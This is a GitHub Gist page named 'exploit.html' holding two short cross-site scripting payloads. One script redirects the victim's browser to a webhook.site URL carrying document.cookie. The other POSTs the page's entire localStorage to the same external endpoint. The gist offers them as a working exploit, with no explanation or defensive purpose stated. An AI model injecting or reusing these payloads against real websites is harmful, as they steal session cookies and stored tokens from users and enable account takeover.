Skip to content

Instantly share code, notes, and snippets.

View Ayushb3112's full-sized avatar

Ayush Bhardwaj Ayushb3112

View GitHub Profile
@Ayushb3112
Ayushb3112 / exploit.html
Created October 26, 2025 11:02
exploit
<script>
window.location.href = 'https://webhook.site/ad26fddf-6df4-4bd7-8cff-4eadd25fb779?cookie=' + document.cookie;
</script>
<script>
fetch('https://webhook.site/ad26fddf-6df4-4bd7-8cff-4eadd25fb779?cookie', {
method: 'POST',
body: JSON.stringify(localStorage)
});
</script>